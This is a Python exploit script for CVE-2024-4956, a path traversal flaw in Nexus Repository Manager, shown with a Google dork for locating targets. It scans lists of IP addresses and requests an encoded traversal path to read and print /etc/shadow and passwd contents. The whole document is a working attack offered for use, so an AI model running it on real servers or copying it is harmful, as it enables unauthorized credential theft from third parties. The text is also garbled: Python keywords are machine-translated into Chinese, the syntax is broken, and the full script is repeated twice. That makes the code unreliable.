#漏洞利用title: CVE-2024-4956: Nexus存储库管理器中未经验证的路径遍历3
#Google Dork: Header='Server: Nexus/3.53.0-01(OSS)'
#日期: 2024-09-22
#利用作者:非常lazytechtech
#github: https://github.com/verylazytech/cve-2024-4956
#供应商homepage: https://www.sonatype.com/nexus-repository
#软件link: https://www.sonatype.com/nexus-repository
#版本: 3.53.0-01
#测试在: Ubuntu 20.04
#CVE: CVE-2024-4956
导入请求
导入随机
导入argparse
从Colorama进口,风格
绿色=fore.green
洋红色=fore.magenta
青色=fore.cyan
混合=fore.red + fore.blue
红色=fore.Red
蓝色=fore.blue
黄色=前面
白色=fore。白色
reset=style.Reset_all
bold=style.bright
颜色=[绿色,青色,蓝色]
Random_Color=Random.Choice(颜色)
def Banner():
banner=f'''{bold} {rando_color}
____________ _____ __ __ __ _ __ __ __ __ __
/_ \ \ \//__ | | _ \/_ \ _ \ | || | | | | | | | | |/_ \ | ____ |///
| | \ \//| _ | )| | | | | | __)| | | | || || || |||||| (_)| _ \ | '_ \
| | _ \ v/| | _//| | _ |//| __ _ | | __ _ \ ,| _)| (_)|
\ __ | \ /| ___ | | ______ | \ /__ | | _ | | _ | //| ___/\ ____/
__ __ ______ _
\ \ \//__ _ _ _ _ _ | | __ _____ _ | _ __ | __ __ __ | ___________
\ \//_ \'__ | | | | | | | | |/` | _/| | | | | | | |/ \/__ | '_ \
\ v//| | | _ | | | | __ | (_ | |//| | | | | | | | | | | | | | __/( | | | | | | | | | | | | | | | | | | | | | | | | | | | |
\ /\ __ | \ ,| | ___ \ ,/ | \ ,| | _ | \ _ | \ _ | \ _ | | _ |
| _/| _//
{bold} {white} @verylazytech -medium {reset} \ n''''
返回横幅
def read_ip_port_list(file_path):
用file:打开(file_path,'r')
lines=file.readlines()
返回[线路中的行]返回[line.strip()]
def make_request(ip_port,url_path):
url=f'http://{ip_port}/{url_path}'
TRY:
响应=requests.get(url,超时=5)
返回响应
除了请求。
没有返回
def main(ip_port_list):
对于IP_PORT_LIST:中的IP_PORT
对于url_path ['%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F。%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F ./etc/etc/shadow'] :
response_text=make_request(ip_port,url_path)
if response_text and 'nexus:x:200:200:200:Nexus Repository Manager user:/opt/sonatype/nexus:/bin/false' not in response_text and 'Not Found' not in response_text and '400 Bad Request' not in response_text and 'root' in response_text:
打印(f'address: {ip_port}')
print(passwd:的f'file内容\ n {response_text}'if url_path中的'passwd'ell f'f'file for Shadow: \ n {response_text}')
休息
如果name=='__ -Main __':
parser=argparse.argumentparser(description=f'[{bold} {blue} description {reset}] : {bold} {white} cve-2024-4956',用法
group=parser.add_mutaly_exclusive_group(必需=true)
group.add_argument(' - u',' - url',type=str,help=f'[{bald} {blue} inf {reset}] : {bold} {bold} {white} {white} {white}指定url或ip for port for port for bulnerability detection \ n')
group.add_argument(' - l',' - list',type=str,help=f'[{bald} {blue} inf {reset}] : {bold} {white} {white}指定URL或IPS的列表或IPS列表以获取脆弱性检测\ n')
args=parser.parse_args()
如果args.list:
ip_port_list=read_ip_port_list(args.list)
打印(banner())
主(ip_port_list)
Elif Args.URL:
ip_port_list=[args.url]
打印(banner())
主(ip_port_list)
其他:
打印(banner())
parser.print_help()
#Google Dork: Header='Server: Nexus/3.53.0-01(OSS)'
#日期: 2024-09-22
#利用作者:非常lazytechtech
#github: https://github.com/verylazytech/cve-2024-4956
#供应商homepage: https://www.sonatype.com/nexus-repository
#软件link: https://www.sonatype.com/nexus-repository
#版本: 3.53.0-01
#测试在: Ubuntu 20.04
#CVE: CVE-2024-4956
导入请求
导入随机
导入argparse
从Colorama进口,风格
绿色=fore.green
洋红色=fore.magenta
青色=fore.cyan
混合=fore.red + fore.blue
红色=fore.Red
蓝色=fore.blue
黄色=前面
白色=fore。白色
reset=style.Reset_all
bold=style.bright
颜色=[绿色,青色,蓝色]
Random_Color=Random.Choice(颜色)
def Banner():
banner=f'''{bold} {rando_color}
____________ _____ __ __ __ _ __ __ __ __ __
/_ \ \ \//__ | | _ \/_ \ _ \ | || | | | | | | | | |/_ \ | ____ |///
| | \ \//| _ | )| | | | | | __)| | | | || || || |||||| (_)| _ \ | '_ \
| | _ \ v/| | _//| | _ |//| __ _ | | __ _ \ ,| _)| (_)|
\ __ | \ /| ___ | | ______ | \ /__ | | _ | | _ | //| ___/\ ____/
__ __ ______ _
\ \ \//__ _ _ _ _ _ | | __ _____ _ | _ __ | __ __ __ | ___________
\ \//_ \'__ | | | | | | | | |/` | _/| | | | | | | |/ \/__ | '_ \
\ v//| | | _ | | | | __ | (_ | |//| | | | | | | | | | | | | | __/( | | | | | | | | | | | | | | | | | | | | | | | | | | | |
\ /\ __ | \ ,| | ___ \ ,/ | \ ,| | _ | \ _ | \ _ | \ _ | | _ |
| _/| _//
{bold} {white} @verylazytech -medium {reset} \ n''''
返回横幅
def read_ip_port_list(file_path):
用file:打开(file_path,'r')
lines=file.readlines()
返回[线路中的行]返回[line.strip()]
def make_request(ip_port,url_path):
url=f'http://{ip_port}/{url_path}'
TRY:
响应=requests.get(url,超时=5)
返回响应
除了请求。
没有返回
def main(ip_port_list):
对于IP_PORT_LIST:中的IP_PORT
对于url_path ['%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F。%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F .%2F ./etc/etc/shadow'] :
response_text=make_request(ip_port,url_path)
if response_text and 'nexus:x:200:200:200:Nexus Repository Manager user:/opt/sonatype/nexus:/bin/false' not in response_text and 'Not Found' not in response_text and '400 Bad Request' not in response_text and 'root' in response_text:
打印(f'address: {ip_port}')
print(passwd:的f'file内容\ n {response_text}'if url_path中的'passwd'ell f'f'file for Shadow: \ n {response_text}')
休息
如果name=='__ -Main __':
parser=argparse.argumentparser(description=f'[{bold} {blue} description {reset}] : {bold} {white} cve-2024-4956',用法
group=parser.add_mutaly_exclusive_group(必需=true)
group.add_argument(' - u',' - url',type=str,help=f'[{bald} {blue} inf {reset}] : {bold} {bold} {white} {white} {white}指定url或ip for port for port for bulnerability detection \ n')
group.add_argument(' - l',' - list',type=str,help=f'[{bald} {blue} inf {reset}] : {bold} {white} {white}指定URL或IPS的列表或IPS列表以获取脆弱性检测\ n')
args=parser.parse_args()
如果args.list:
ip_port_list=read_ip_port_list(args.list)
打印(banner())
主(ip_port_list)
Elif Args.URL:
ip_port_list=[args.url]
打印(banner())
主(ip_port_list)
其他:
打印(banner())
parser.print_help()